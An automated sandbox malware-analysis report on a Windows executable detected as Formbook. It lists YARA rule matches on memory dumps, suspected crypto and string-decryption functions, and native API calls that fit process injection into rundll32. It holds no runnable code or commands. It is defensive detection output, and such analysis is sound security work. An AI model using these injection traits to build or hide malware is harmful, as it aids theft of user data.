Source: 0000000E.00000002.46596157164.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Uses 32bit PE files
Source: aSsc9zh1ex.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 0000000A.00000000.42010338948.000000001441C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.42010338948.000000001441C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.46595730295.00000000043D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.46595730295.00000000043D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.42080260452.000000001441C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.42080260452.000000001441C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.42265914211.000000001D3A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.42265914211.000000001D3A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.42240670582.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.42240670582.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.46596157164.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.46596157164.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 1_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_0040350A
Detected potential crypto function
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 1_2_6F001BFF 1_2_6F001BFF
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7EFDF4 7_2_1D7EFDF4
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D759DD0 7_2_1D759DD0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D80FD27 7_2_1D80FD27
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D807D4C 7_2_1D807D4C
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D753C60 7_2_1D753C60
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7D7CE8 7_2_1D7D7CE8
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76FCE0 7_2_1D76FCE0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7E9C98 7_2_1D7E9C98
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7CFF40 7_2_1D7CFF40
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D801FC6 7_2_1D801FC6
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D80FF63 7_2_1D80FF63
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D809ED2 7_2_1D809ED2
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D751EB2 7_2_1D751EB2
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7959C0 7_2_1D7959C0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D759870 7_2_1D759870
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76B870 7_2_1D76B870
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7C5870 7_2_1D7C5870
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D8018DA 7_2_1D8018DA
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D8078F3 7_2_1D8078F3
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D753800 7_2_1D753800
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7C98B2 7_2_1D7C98B2
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D80F872 7_2_1D80F872
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D78DB19 7_2_1D78DB19
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D80FB2E 7_2_1D80FB2E
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D80FA89 7_2_1D80FA89
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76FAA0 7_2_1D76FAA0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D8075C6 7_2_1D8075C6
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D80F5C9 7_2_1D80F5C9
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7BD480 7_2_1D7BD480
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7FD646 7_2_1D7FD646
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7ED62C 7_2_1D7ED62C
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D80F6F6 7_2_1D80F6F6
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7C36EC 7_2_1D7C36EC
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D79717A 7_2_1D79717A
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7ED130 7_2_1D7ED130
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73F113 7_2_1D73F113
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76B1E0 7_2_1D76B1E0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7551C0 7_2_1D7551C0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D8070F1 7_2_1D8070F1
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D75B0D0 7_2_1D75B0D0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D78508C 7_2_1D78508C
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D80F330 7_2_1D80F330
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D741380 7_2_1D741380
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73D2EC 7_2_1D73D2EC
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D80124C 7_2_1D80124C
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D750D69 7_2_1D750D69
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D74AD00 7_2_1D74AD00
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D762DB0 7_2_1D762DB0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7FEC4C 7_2_1D7FEC4C
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D75AC20 7_2_1D75AC20
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7CEC20 7_2_1D7CEC20
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D740C12 7_2_1D740C12
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D81ACEB 7_2_1D81ACEB
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D768CDF 7_2_1D768CDF
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D80EC60 7_2_1D80EC60
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D806C69 7_2_1D806C69
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D80EFBF 7_2_1D80EFBF
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D75CF00 7_2_1D75CF00
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D756FE0 7_2_1D756FE0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7F0E6D 7_2_1D7F0E6D
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D770E50 7_2_1D770E50
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D800EAD 7_2_1D800EAD
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D792E48 7_2_1D792E48
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D742EE8 7_2_1D742EE8
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D80E9A6 7_2_1D80E9A6
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D74E9A0 7_2_1D74E9A0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D736868 7_2_1D736868
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7F0835 7_2_1D7F0835
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D77E810 7_2_1D77E810
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7528C0 7_2_1D7528C0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D766882 7_2_1D766882
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D750B10 7_2_1D750B10
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7C4BC0 7_2_1D7C4BC0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D80CA13 7_2_1D80CA13
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D80EA5B 7_2_1D80EA5B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D81A526 7_2_1D81A526
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D750445 7_2_1D750445
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D75A760 7_2_1D75A760
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D752760 7_2_1D752760
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D806757 7_2_1D806757
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D774670 7_2_1D774670
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D80A6C0 7_2_1D80A6C0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76C600 7_2_1D76C600
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D74C6E0 7_2_1D74C6E0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D750680 7_2_1D750680
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D81010E 7_2_1D81010E
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7FE076 7_2_1D7FE076
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7400A0 7_2_1D7400A0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D75E310 7_2_1D75E310
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04670445 14_2_04670445
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0473A526 14_2_0473A526
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04694670 14_2_04694670
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0468C600 14_2_0468C600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0466C6E0 14_2_0466C6E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0472A6C0 14_2_0472A6C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04670680 14_2_04670680
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0467A760 14_2_0467A760
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04672760 14_2_04672760
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04726757 14_2_04726757
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0471E076 14_2_0471E076
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046600A0 14_2_046600A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0473010E 14_2_0473010E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0467E310 14_2_0467E310
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0472EC60 14_2_0472EC60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04726C69 14_2_04726C69
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0471EC4C 14_2_0471EC4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0467AC20 14_2_0467AC20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046EEC20 14_2_046EEC20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04660C12 14_2_04660C12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0473ACEB 14_2_0473ACEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04688CDF 14_2_04688CDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04670D69 14_2_04670D69
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0466AD00 14_2_0466AD00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04682DB0 14_2_04682DB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04710E6D 14_2_04710E6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046B2E48 14_2_046B2E48
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04690E50 14_2_04690E50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04662EE8 14_2_04662EE8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04720EAD 14_2_04720EAD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0467CF00 14_2_0467CF00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04676FE0 14_2_04676FE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0472EFBF 14_2_0472EFBF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04656868 14_2_04656868
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04710835 14_2_04710835
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0469E810 14_2_0469E810
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046728C0 14_2_046728C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04686882 14_2_04686882
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0466E9A0 14_2_0466E9A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0472E9A6 14_2_0472E9A6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0472EA5B 14_2_0472EA5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0472CA13 14_2_0472CA13
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04670B10 14_2_04670B10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046E4BC0 14_2_046E4BC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046DD480 14_2_046DD480
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_047275C6 14_2_047275C6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0472F5C9 14_2_0472F5C9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0471D646 14_2_0471D646
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0470D62C 14_2_0470D62C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046E36EC 14_2_046E36EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0472F6F6 14_2_0472F6F6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_047270F1 14_2_047270F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0467B0D0 14_2_0467B0D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046A508C 14_2_046A508C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046B717A 14_2_046B717A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0470D130 14_2_0470D130
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0465F113 14_2_0465F113
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0468B1E0 14_2_0468B1E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046751C0 14_2_046751C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0472124C 14_2_0472124C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0465D2EC 14_2_0465D2EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0472F330 14_2_0472F330
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04661380 14_2_04661380
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04673C60 14_2_04673C60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046F7CE8 14_2_046F7CE8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0468FCE0 14_2_0468FCE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04709C98 14_2_04709C98
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04727D4C 14_2_04727D4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0472FD27 14_2_0472FD27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0470FDF4 14_2_0470FDF4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04679DD0 14_2_04679DD0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04729ED2 14_2_04729ED2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04671EB2 14_2_04671EB2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0472FF63 14_2_0472FF63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046EFF40 14_2_046EFF40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04721FC6 14_2_04721FC6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0472F872 14_2_0472F872
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04679870 14_2_04679870
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0468B870 14_2_0468B870
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046E5870 14_2_046E5870
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04673800 14_2_04673800
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_047278F3 14_2_047278F3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_047218DA 14_2_047218DA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046E98B2 14_2_046E98B2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046B59C0 14_2_046B59C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0468FAA0 14_2_0468FAA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0472FA89 14_2_0472FA89
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0472FB2E 14_2_0472FB2E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046ADB19 14_2_046ADB19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0054E7C6 14_2_0054E7C6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00532D90 14_2_00532D90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00532D87 14_2_00532D87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00539E50 14_2_00539E50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00539E4F 14_2_00539E4F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00532FB0 14_2_00532FB0
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: String function: 1D7BE692 appears 85 times
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: String function: 1D73B910 appears 272 times
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: String function: 1D785050 appears 37 times
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: String function: 1D7CEF10 appears 105 times
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: String function: 1D797BE4 appears 98 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 046A5050 appears 37 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 046DE692 appears 85 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 046B7BE4 appears 98 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 046EEF10 appears 105 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 0465B910 appears 272 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D782D10 NtQuerySystemInformation,LdrInitializeThunk, 7_2_1D782D10
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D782DC0 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_1D782DC0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D782DA0 NtReadVirtualMemory,LdrInitializeThunk, 7_2_1D782DA0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D782C50 NtUnmapViewOfSection,LdrInitializeThunk, 7_2_1D782C50
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D782C30 NtMapViewOfSection,LdrInitializeThunk, 7_2_1D782C30
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D782CF0 NtDelayExecution,LdrInitializeThunk, 7_2_1D782CF0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D782F00 NtCreateFile,LdrInitializeThunk, 7_2_1D782F00
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D782E50 NtCreateSection,LdrInitializeThunk, 7_2_1D782E50
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D782ED0 NtResumeThread,LdrInitializeThunk, 7_2_1D782ED0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D782EB0 NtProtectVirtualMemory,LdrInitializeThunk, 7_2_1D782EB0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7829F0 NtReadFile,LdrInitializeThunk, 7_2_1D7829F0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D782B10 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_1D782B10
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D782BC0 NtQueryInformationToken,LdrInitializeThunk, 7_2_1D782BC0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D782B90 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_1D782B90
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D782A80 NtClose,LdrInitializeThunk, 7_2_1D782A80
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D783C30 NtOpenProcessToken, 7_2_1D783C30
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D783C90 NtOpenThread, 7_2_1D783C90
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7838D0 NtGetContextThread, 7_2_1D7838D0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7834E0 NtCreateMutant, 7_2_1D7834E0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D782D50 NtWriteVirtualMemory, 7_2_1D782D50
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D782C20 NtSetInformationFile, 7_2_1D782C20
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D782C10 NtOpenProcess, 7_2_1D782C10
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D782CD0 NtEnumerateKey, 7_2_1D782CD0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D782F30 NtOpenDirectoryObject, 7_2_1D782F30
